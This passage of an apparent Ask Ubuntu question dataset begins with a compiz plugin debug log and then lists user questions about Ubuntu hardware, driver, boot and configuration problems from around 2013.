compiz ( core ) - debug : trying to load imgsvg from : /usr/lib/ compiz/libimgsvg.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libimgsvg.so compiz ( core ) - debug : loaded plugin imgsvg from : /usr/lib/ compiz/libimgsvg.so compiz ( core ) - info : starting plugin : imgsvg compiz ( core ) - debug : started plugin : imgsvg compiz ( core ) - info : loading plugin : move compiz ( core ) - debug : trying to load move from : /home/josh/ . compiz-1/plugins/libmove.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libmove.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load move from : /usr/lib/ compiz/libmove.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libmove.so compiz ( core ) - debug : loaded plugin move from : /usr/lib/ compiz/libmove.so compiz ( core ) - info : starting plugin : move compiz ( core ) - debug : started plugin : move compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - debug : trying to load compiztoolbox from : /home/josh/ . compiz-1/plugins/lib compiztoolbox.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/lib compiztoolbox.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load compiztoolbox from : /usr/lib/ compiz/lib compiztoolbox.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/lib compiztoolbox.so compiz ( core ) - debug : loaded plugin compiztoolbox from : /usr/lib/ compiz/lib compiztoolbox.so compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - debug : started plugin : compiztoolbox compiz ( core ) - info : loading plugin : regex compiz ( core ) - debug : trying to load regex from : /home/josh/ . compiz-1/plugins/libregex.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libregex.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load regex from : /usr/lib/ compiz/libregex.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libregex.so compiz ( core ) - debug : loaded plugin regex from : /usr/lib/ compiz/libregex.so compiz ( core ) - info : starting plugin : regex compiz ( core ) - debug : started plugin : regex compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - debug : trying to load mousepoll from : /home/josh/ . compiz-1/plugins/libmousepoll.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libmousepoll.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load mousepoll from : /usr/lib/ compiz/libmousepoll.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libmousepoll.so compiz ( core ) - debug : loaded plugin mousepoll from : /usr/lib/ compiz/libmousepoll.so compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - debug : started plugin : mousepoll compiz ( core ) - info : loading plugin : thumbnail compiz ( core ) - debug : trying to load thumbnail from : /home/josh/ . compiz-1/plugins/libthumbnail.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libthumbnail.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load thumbnail from : /usr/lib/ compiz/libthumbnail.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libthumbnail.so compiz ( core ) - debug : loaded plugin thumbnail from : /usr/lib/ compiz/libthumbnail.so compiz ( core ) - info : starting plugin : thumbnail compiz ( core ) - debug : started plugin : thumbnail compiz ( core ) - info : loading plugin : animation compiz ( core ) - debug : trying to load animation from : /home/josh/ . compiz-1/plugins/libanimation.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libanimation.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load animation from : /usr/lib/ compiz/libanimation.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libanimation.so compiz ( core ) - debug : loaded plugin animation from : /usr/lib/ compiz/libanimation.so compiz ( core ) - info : starting plugin : animation compiz ( core ) - debug : started plugin : animation compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - debug : trying to load workarounds from : /home/josh/ . compiz-1/plugins/libworkarounds.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libworkarounds.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load workarounds from : /usr/lib/ compiz/libworkarounds.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libworkarounds.so compiz ( core ) - debug : loaded plugin workarounds from : /usr/lib/ compiz/libworkarounds.so compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - debug : started plugin : workarounds compiz ( core ) - info : loading plugin : session compiz ( core ) - debug : trying to load session from : /home/josh/ . compiz-1/plugins/libsession.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libsession.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load session from : /usr/lib/ compiz/libsession.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libsession.so compiz ( core ) - debug : loaded plugin session from : /usr/lib/ compiz/libsession.so compiz ( core ) - info : starting plugin : session compiz ( core ) - debug : started plugin : session compiz ( core ) - info : loading plugin : staticswitcher compiz ( core ) - debug : trying to load staticswitcher from : /home/josh/ . compiz-1/plugins/libstaticswitcher.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libstaticswitcher.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load staticswitcher from : /usr/lib/ compiz/libstaticswitcher.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libstaticswitcher.so compiz ( core ) - debug : loaded plugin staticswitcher from : /usr/lib/ compiz/libstaticswitcher.so compiz ( core ) - info : starting plugin : staticswitcher compiz ( core ) - debug : started plugin : staticswitcher compiz ( core ) - info : loading plugin : expo compiz ( core ) - debug : trying to load expo from : /home/josh/ . compiz-1/plugins/libexpo.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libexpo.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load expo from : /usr/lib/ compiz/libexpo.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libexpo.so compiz ( core ) - debug : loaded plugin expo from : /usr/lib/ compiz/libexpo.so compiz ( core ) - info : starting plugin : expo compiz ( core ) - debug : started plugin : expo compiz ( core ) - info : loading plugin : ring compiz ( core ) - debug : trying to load ring from : /home/josh/ . compiz-1/plugins/libring.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libring.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load ring from : /usr/lib/ compiz/libring.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libring.so compiz ( core ) - debug : loaded plugin ring from : /usr/lib/ compiz/libring.so compiz ( core ) - info : starting plugin : ring compiz ( core ) - debug : started plugin : ring compiz ( core ) - info : loading plugin : fade compiz ( core ) - debug : trying to load fade from : /home/josh/ . compiz-1/plugins/libfade.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libfade.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load fade from : /usr/lib/ compiz/libfade.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libfade.so compiz ( core ) - debug : loaded plugin fade from : /usr/lib/ compiz/libfade.so compiz ( core ) - info : starting plugin : fade compiz ( core ) - debug : started plugin : fade compiz ( core ) - info : loading plugin : addhelper compiz ( core ) - debug : trying to load addhelper from : /home/josh/ . compiz-1/plugins/libaddhelper.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libaddhelper.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load addhelper from : /usr/lib/ compiz/libaddhelper.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libaddhelper.so compiz ( core ) - debug : loaded plugin addhelper from : /usr/lib/ compiz/libaddhelper.so compiz ( core ) - info : starting plugin : addhelper compiz ( core ) - debug : started plugin : addhelper compiz ( core ) - info : loading plugin : scale compiz ( core ) - debug : trying to load scale from : /home/josh/ . compiz-1/plugins/libscale.so compiz ( core ) - debug : dlopen failed : /home/josh/ . compiz-1/plugins/libscale.so : can not open shared object file : no such file or directory compiz ( core ) - debug : trying to load scale from : /usr/lib/ compiz/libscale.so compiz ( core ) - debug : opened library : /usr/lib/ compiz/libscale.so compiz ( core ) - debug : loaded plugin scale from : /usr/lib/ compiz/libscale.so compiz ( core ) - info : starting plugin : scale compiz ( core ) - debug : started plugin : scale compiz ( core ) - debug : refusing to manage window 0x3e00090 compiz ( core ) - debug : refusing to manage window 0x3e00093 compiz ( core ) - debug : refusing to manage window 0x3e00096 compiz ( core ) - debug : refusing to manage window 0x3e00099 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 1721 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 714 border : 0 , sibling : 0x0 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 1735 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 714 border : 0 , sibling : 0x3e00090 compiz ( core ) - debug : refusing to manage window 0x3e0009c compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4369 compiz ( core ) - debug : - event window 0x3e00096 compiz ( core ) - debug : - x : 452 y : 738 width : 1280 height : 190 border : -986896 , sibling : 0xff6e6e6e compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 1801 compiz ( core ) - debug : - event window 0x3e0009c compiz ( core ) - debug : - x : 554 y : 290 width : 722 height : 421 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : refusing to manage window 0x3e0009f compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 1867 compiz ( core ) - debug : - event window 0x3e0009f compiz ( core ) - debug : - x : 0 y : 24 width : 722 height : 421 border : 0 , sibling : 0x3e0009c compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4427 compiz ( core ) - debug : - event window 0x3e0009f compiz ( core ) - debug : - x : -2 y : -1 width : 726 height : 448 border : 0 , sibling : 0x3e0009c compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4461 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 776 border : 0 , sibling : 0x3e00090 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4508 compiz ( core ) - debug : - event window 0x3e0009f compiz ( core ) - debug : - x : -4 y : -26 width : 726 height : 448 border : 0 , sibling : 0x3e0009c compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4666 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -4 y : -26 width : 726 height : 448 border : 0 , sibling : 0x0 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4690 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : 0 y : 24 width : 726 height : 448 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4766 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 550 y : 240 width : 726 height : 448 border : 128 , sibling : 0x30 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 4790 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 552 y : 265 width : 726 height : 448 border : 128 , sibling : 0x3e0013e compiz ( core ) - debug : stacks are out of sync compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4369 compiz ( core ) - debug : - event window 0x3e00096 compiz ( core ) - debug : - x : 452 y : 738 width : 1280 height : 190 border : -986896 , sibling : 0xff6e6e6e compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 5070 compiz ( core ) - debug : - event window 0x3e00096 compiz ( core ) - debug : - x : 0 y : 610 width : 1280 height : 190 border : -986896 , sibling : 0xff6e6e6e compiz ( core ) - debug : refusing to manage window 0x3e00139 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4461 compiz ( core ) - debug : - event window 0x3e00099 compiz ( core ) - debug : - x : 0 y : 24 width : 1280 height : 776 border : 0 , sibling : 0x3e00090 compiz ( core ) - debug : refusing to manage window 0x3e0013e compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4666 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -4 y : -26 width : 726 height : 448 border : 0 , sibling : 0x0 compiz ( core ) - debug : refusing to manage window 0x3e00140 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4690 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : 0 y : 24 width : 726 height : 448 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : refusing to manage window 0x3e00142 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4766 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 550 y : 240 width : 726 height : 448 border : 128 , sibling : 0x30 compiz ( core ) - debug : refusing to manage window 0x3e00144 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 4790 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 552 y : 265 width : 726 height : 448 border : 128 , sibling : 0x3e0013e compiz ( core ) - debug : refusing to manage window 0x3e00154 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 5070 compiz ( core ) - debug : - event window 0x3e00096 compiz ( core ) - debug : - x : 0 y : 610 width : 1280 height : 190 border : -986896 , sibling : 0xff6e6e6e compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 5834 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -7 y : 24 width : 740 height : 455 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 5869 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 545 y : 265 width : 740 height : 455 border : 128 , sibling : 0x3e0013e compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 5834 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -7 y : 24 width : 740 height : 455 border : 0 , sibling : 0x3e00099 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 5869 compiz ( core ) - debug : - event window 0x3e00142 compiz ( core ) - debug : - x : 545 y : 265 width : 740 height : 455 border : 128 , sibling : 0x3e0013e compiz ( core ) - debug : pending request : compiz ( core ) - debug : - event serial : 6908 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -7 y : 24 width : 740 height : 455 border : 0 , sibling : 0x3e00142 compiz ( core ) - debug : received event : compiz ( core ) - debug : - event serial : 6908 compiz ( core ) - debug : - event window 0x3e0013e compiz ( core ) - debug : - x : -7 y : 24 width : 740 height : 455 border : 0 , sibling : 0x3e00142
345269	wifi card can see network but can not connect	i just installed ubuntu 12.04 on a toshiba satellite . i am able to see many wireless networks , but i am not able to connect . here is the output of various commands that found looking for existing answers . lshw -c network : *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. ... . lscpi -k : ... 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-expres ) ( rev 01 ) subsystem : askey computer corp device 7159 kernel driver in use : ath9k kernel modules : ath9k ( other entries do not contain the word wire . ) rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no i saw a recommendation to add blacklist acer_wmi to /etc/modprobe.d/blacklist.conf , but that did not change anything . i 've run out of ideas as to why it is n't working . the driver appears to be installed and it can even see the network . it is even making repeated attempts to connect to it , but it is failing . i 've also tried connecting to an unsecured network , which also fails . however , as all i know is that it was an unsecured 'linksys ' network which might be doing something like mac filtering , that is not very useful evidence . edit : after waiting an hour or so , it connected without any intervention on my part . i then downloaded all of the updates and rebooted . the wifi connection was there for the hour of downloading . i then rebooted , since the updates required it . it now is back to not connecting .
345270	is there any way to change the global menu bar buttons in unity ?	when i change themes , the unity global menu bar seems to stick to the default theme instead of using the minimize/maximize/close buttons that normal windows use . is there any way to change this ?
345271	add `` not '' to if statement in shell script	i have the following script that should exist if the user does not exist . # check if user currently exists on system if id $ user > /dev/null 2 > & 1 then # user exists no need to exit program echo `` blah blah , what a waste of space '' else echo `` this user does not exists . please create that user before using this script.\n '' exit fi my problem is that i would ideally like to place a `` not '' if that first if statement so that i can trim down my if , else statement . ideally i would like something like this : if ! ( id $ user > /dev/null 2 > & 1 ) then echo `` this user does not exists . please create that user before using this script.\n '' exit fi
345274	is it `` ok '' to install ubuntu on one laptop and put the ssd into another ?	if i install ubuntu on say.. my intel based netbook ( atom ) and then take out the ssd and stick in into another intel based laptop ( i3 ) for use would there be any issues that would arise ? drivers , packages not installed , idk ? i do know in windows this would be a major no no .
345278	i just moved from denmark to the uk . how can i change my music store in ubuntu to , so that i can get a wider choice in music to buy ?	i have recently moved from denmark to the united kingdom . how can i change from the non-specific europe shop ( that has less music available ) to the uk shop ( that has more labels signed up ) ?
345280	gnome desktop environment greeter	i recently installed gnome shell as one of my desktop environments on ubuntu 12.04 ( with unity ) and i am trying to set gnome shell 's greeter , if it has one , as the greeter , but i do n't know what i should replace the unity-greeter in greeter-session=unity-greeter with in the lightdm.conf file . i am trying to keep the unity environments , because i use both for different things .
345281	unable to install ubuntu in toshiba satellite l850-1rz	hello to everyone and thanks to anyone who answers this for his/her time . well , i have the computer that i mention on the title and i found that after booting the live cd up ( with efi ) , when the system starts loading it just hangs up always at the same point , more or less : when it is stopping the anac ( h ) ronic cron service . the cd reader just stops working and the loading process stops there . i use as boot option the nomodeset ( because if i do n't do so the screen just starts flickering ) and i removed the splash and silent options to be able to see where it does n't work . if that 's any help , i have windows 8 installed on the computer and i planned to do a dual boot with ubuntu 13.04 . thanks again to anyone who answers this question !
345282	is there a way to find the lbas for free blocks in ext4	tune2fs can show the number of free blocks . is there a method/tool to find the actual logical block addresses for each free block ? thanks in advance
345283	bitcoin upgrade to 0.8.5	when will the raring repository include bitcoin-qt 0.8.5 which fixes previous versions where the block index gets screwed up as of september 9 , 2013 ? ?
345284	disable number keys on top-row of keyboard	i want to disable the number-part of the keys on the top-row of my keyboard . i only use the numberpad to the right of my keyboard to enter numbers . i get very frustrated when i want to type a symbol which appears on the top-row ( e.g . 4 and $ ) and get `` 4 '' instead of `` $ '' . the proper answer is to take typing lessons but i 'm too old to do that and totally refuse to do so . there must be a way that i can restrict my top-row to be symbols only ? answers/tips please ?
345285	black screen whenever i try to boot ubuntu 13.04 with dual graphics	i 'm currently using a lenovo ideapad y510p with sli dual graphics [ 2 nvidia geforce gt 750m cards ] . my computer has a uefi bios and windows 8 pre-installed on the efi hdd . i installed ubuntu 13.04 using a liveusb . i turned off secureboot in the bios and fastboot in windows 8 . after booting from the usb and selecting `` install ubuntu '' in the menu , my screen turned black and would n't display anything . it was n't a brightness issue as the lcd backlight was still on . i finally managed to install ubuntu but i had to remove my 2nd nvidia card for it to actually display . ubuntu is running off of my core i7 haswell graphics instead of the nvidia card . i installed the nvidia drivers [ 325.15 ] , but it still seems to be running off the haswell integrated graphics . also , when i plug in the 2nd nvidia card again , the same black screen issue arises when i try to boot up my installed ubuntu . i would greatly appreciate if someone helped me to get ubuntu to run properly with both of my nvidia cards . recap : ubuntu is installed alongside windows , not in place of . ubuntu will only load properly when one of my video cards is unplugged . and it is still only using the core i7 haswell integrated graphics . edit : this is the driver i installed : http : //www.nvidia.com/object/linux-display-amd64-325.15-driver.html
345286	how do i install ia32-libs-multiarch	i 'm trying to install ia32-libs-multiarch but i get the following error . what am i doing wrong ? reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed depends : gtk2-engines-murrine : i386 but it is not going to be installed depends : gtk2-engines-pixbuf : i386 but it is not going to be installed depends : ibus-gtk : i386 but it is not going to be installed depends : libaudio2 : i386 but it is not going to be installed depends : libcanberra-gtk-module : i386 but it is not going to be installed depends : libcups2 : i386 but it is not going to be installed depends : libcupsimage2 : i386 but it is not going to be installed depends : libgail-common : i386 but it is not going to be installed depends : libgtk2.0-0 : i386 but it is not going to be installed depends : libqt4-opengl : i386 but it is not going to be installed depends : libqt4-qt3support : i386 but it is not going to be installed depends : libqt4-scripttools : i386 but it is not going to be installed depends : libqt4-svg : i386 but it is not going to be installed depends : libqtgui4 : i386 but it is not going to be installed depends : libqtwebkit4 : i386 but it is not going to be installed depends : libxaw7 : i386 but it is not going to be installed depends : xaw3dg : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
345291	asus n550jv graphics	i have bought a relatively new asus n550jv notebook , which has two graphic cards and uses a technology called optimus . this is the hardware information : $ lshw -c display *-display unclaimed description : 3d controller product : gk107m [ geforce gt 750m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) distribution information : $ uname -a linux thomas-n550jv 3.8.0-30-generic # 44~precise1-ubuntu smp fri aug 23 18:32:41 utc 2013 x86_64 x86_64 x86_64 gnu/linux what i want is to use the nvidia card as my default graphics adapter . is this possible ? what i 've tried : installing nvidia-319-updates installing xserver-xorg-video-intel using the ubuntu-x-swat/x-updates ppa and installing the above two drivers , independently and together . using the official nvidia 319.49 driver
345293	how can i configure a computer to connect to the internet through another computer that has two nics ?	i use a hard wired connection from my box to my router , i have an older system without a wireless card and want to run it ad hoc . my master box is a dell optiplex gx270 running ubuntu 12.04 . the box i want to connect through it is an hp pavilion 6740c running puppy 5.6.1 . i 've tried to install wireless cards but i 'm too far from the router . the dell has two nic cards , so i wondered if i could configure the hp to connect through the dell .
345295	opengl 4.0 on ubuntu 13.04 using an intel graphics card	i have a new laptop with an iris pro 5200 integrated graphics card , everywhere i look it says that this card supports opengl 4.0 . the reason why i want 4.0 ( or 3.3+ to be more specific ) is that i 'm doing an assignment for uni where i 've received an opengl 3.3 compliant glsl shader to improve , but i can not compile/run it as i only have opengl 3.0 . calling printf ( `` % s\n '' , glgetstring ( gl_version ) ) ; after an opengl context has been created prints : `` 3.0 mesa 9.1.4 '' . for the people with nvidia graphics cards i see that the solution is to install proprietary graphics drivers , but as far as i know intel only has open source graphics drivers . is this correct ? i 'm a novice at best when it comes to linux and especially graphics programming , so please , bear with me .
345296	how to login to newly installed ubuntu	i have just installed ubuntu on a vmware virtual machine . it wants me to login to finish installation , but i do not remember ever creating an account , so i have no idea how to login ! i have tried user ubuntu with no password ( and various passwords for root ) .
345297	input/output error when mounting an ntfs partition	when i try to mount my laptop 's hard drive from a live cd , this error message appears : error mounting /dev/sda3 at /media/ubuntu/acer : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/ubuntu/acer '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . what should i do ?
345298	repaired ubuntu and now grub is n't showing	i recently did a tutorial on ubuntu 12.10 to get nvidia drivers . after doing so , ubuntu kept showing blank screen after login . i then decided to re-insert the ubuntuinstall usb i had . it had an option to `` reinstall ubuntu '' and in the sub category it listed that it would reinstall ubuntu and only delete old ubuntu files . i selected and continued . after it finished i restarted . grub usually shows up and lets me go down and select my `` windows 7 os '' . now there is now os 's to choose from and ubuntu loads immedately . has ubuntu wiped my win7 ? i hope not because i paid for this os and it did not list it would delete it .
345299	corrupted ubuntu on boot menu after windows restore	i have ubuntu installed alongside windows 7 . i wanted a fresh start for my windows os and restored it back to factory settings . i had n't used ubuntu in a while because of a program i had for school that went wonky when i ran it from ubuntu , so honestly i kind of forgot about it despite it containing basically everything i did in university . i normally would 've looked into how restoring back to factory settings would affect ubuntu but i somehow just did n't even think about it . i just tried to load ubuntu from the boot menu and it gave me the message that it was corrupt and could n't be loaded . panic time . what do i do ? ! possibly using 12.x , i last used it almost a year ago and honestly ca n't remember ! edit in response to the comments , thank you to the person who offered me the keyword `` wubi '' and i am confident that 's what i used to install it as i just noticed the error message about the corrupt file contains `` wubi '' . most of the fixes i see when gooling what you suggested are people who do n't have the ubuntu option in the boot menu , but mine is there just corrupted . any other comments or answers greatly appreciated . edit2 i just researched a bit about installing ubuntu alongside windows and i may have been confused as to what `` alongside '' entailed . the first time i used ubuntu i partitioned my hard drive and then installed ubuntu on another partition . i had assumed installing it `` alongside '' windows meant the same thing when i did it on my ( then new ) laptop 2 years ago , but it seems like all it does is install it within the windows partition . thus , if i restored it to factory settings , ubuntu was wiped out as well . am i correct ?
345300	whats wrong with my keyboard shortcuts ?	i have ubuntu 13.04 installed on my dell inspiron 1525 . mine keyboard shortcuts are not working properly . properly in the sense alt + tab works , but alt + f12 not working and many more like screen lock shortcuts . and yes i have defined it as custom shortcuts properly . and yes it works before but after some `` dist-upgrade '' it 's not working . ohh ya.. i am using gnome 3.8 please let me know some tweaks so that it will work .
345303	kde desktop themes not installing ?	i am currently trying out kde plasma as it has far better customization . i tried to install the unity ambiance and unity radiance themes from the desktop theme section in system settings . it says when you click get new themes that i have them both installed but in the theme tab neither one shows up ?
345307	installing ubuntu 12.04 on a lenovo g500	i recently bought a lenovo g500 , and had a rather entertaining time trying to get ubuntu installed . since it came with windows 8 installed it turned out to be an unexpected challenge . for anyone with a lenovo product you are likely to run into the same problem , essentially it refused to even see a new ssd drive i transplanted from another computer . thus began my little journey . windows 8 machines utilize uefi instead of bios and the kicker is that you can only get to it by going through windows . this can be done by going to the lower right hand corner and hitting settings . then change settings , and then general . scroll down to advanced options go into it and choose uefi settings . your machine will then boot into the uefi/bios . you need to enable legacy , set legacy to first , make sure usb boot is enable , and enable bios flash back . ubuntu 12.04 should install normally at this point however the screen will be at its dimmest level or possibly black . hit the brightness control function key and it should become visible . now for my two questions : brightness control has two settings really bright close to maximum and really dim close to black with nothing in between , is there a work around to allow finer adjustment ? any information i would need to provide to get an answer please let me know and let me know how to get . i am merely an apprentice when it comes to using linux . touchpad will not turn off , even though i set it to turn off in the settings , what terminal command do i need to add turn it off ? thank you for any assistance .
345308	lubuntu 13.04 can not add usb printer add button disabled	there seems to be no way to add a usb printer in lubuntu 13.04 and it seems to be a problem from 12.xx forward since with the shell i 'm using the system administration services is not available i have tried the `` run '' sudo system-config-printer and various and sundry things from the help , but nothing seems to work and i can seem to open a working terminal window either . i can get a terminal window , but what do i enter when i get there to install a silly usb printer ?
345314	why are apps disappearing after i install them ?	i am new to ubuntu ( and linux in general ) . i installed ubuntu 13.04 ( after many installs of 12.04 and failed office installs even though the web swears it 's possible ) . i gave up on getting office installed . anyway , yesterday all of a sudden i noticed ubuntu software center was gone . so i rebooted . then , upon logging in , i had a blank desktop . thankfully i left windows 7 installed on a separate partition so i logged in and googled it . i ended up finding some info about booting up , invoking terminal -- but wait , ctrl+alt+t did n't work anymore either ! : ( booted windows 7 back up and googled that . found info about ccsm and also unity -- reset . i booted back into ubuntu , managed to get to a terminal by using ctrl+alt+f1 . i typed ccsm and it said that was n't installed . back to windows 7 . google . found info about resetting unity by doing unity -- reset . then read that was deprecated and to use replace . then read that was deprecated too . ahhhh ! i decided to just boot ubuntu and try things people said were n't possible , because i had the notion that anything i read that was possible was n't , and vise versa . booted into ubuntu , ran unity -- reset and it told me unity was n't installed . thankfully , it said : to install just type sudo apt-get install unity . that worked , and , upon reboot and logging in i now have my desktop icons -- or should i say that left panel thingy . ubuntu software center was still gone but i was able to install that via another command ... even though i used to have it already . finally , to my question . how does stuff just disappear ? did my ubuntu install somehow roll back ? i do n't remember uninstalling anything to make a lot of built-in things just disappear . i installed guake ( the transparent terminal ) and now that 's gone too . when i install stuff , is it installing it to a certain shell ? session ? when i press the `` super key '' ( the windows logo key ) and type term , i no longer have the built-in terminal app . huh ? ! but , i have uxterm and xterm -- both apps i never saw before when i searched for `` term '' in the search ... thingy . ideas ? insight ? anything would be helpful at this point . i love ubuntu and i 'm glad i installed it . not going back to windows . thanks !
345316	ctrl-alt-t opens term executes a command and exits	how do i get to the options screen that sets the command to run and whether to close right away or not . i think i need to get to the `` edit , profiles '' and change the default one . i set it to close immediately after the command executes ( which was a bogus command ) . the window does not stay open long enough for me to be able to change how it is supposed to behave .
345317	after installing ubuntu 12.04.3 , i get a message `` welcome to grub ! '' but i ca n't type or do anything	after installing ubuntu 12.04.3 using wubi , i rebooted my computer and got the message , not exact , but something along the lines of this : hd ( 0 , 0 ) no wubildr hd ( 0 , 1 ) welcome to grub ! but i ca n't do anything at all . does anyone know how to fix this ? i am quite a noob at ubuntu and linux so please keep it as simple as possible .
345318	install 13.04 alongside windows 8 is not there	i am trying to dual boot ubuntu 13.04 and windows 8 , but when i go to install ubuntu from usb the option to install alongside windows 8 is not there . even if i make my own partition in windows 8 and click `` something else '' the partition does not show up but my computer does . how can i fix it to install ubuntu ?
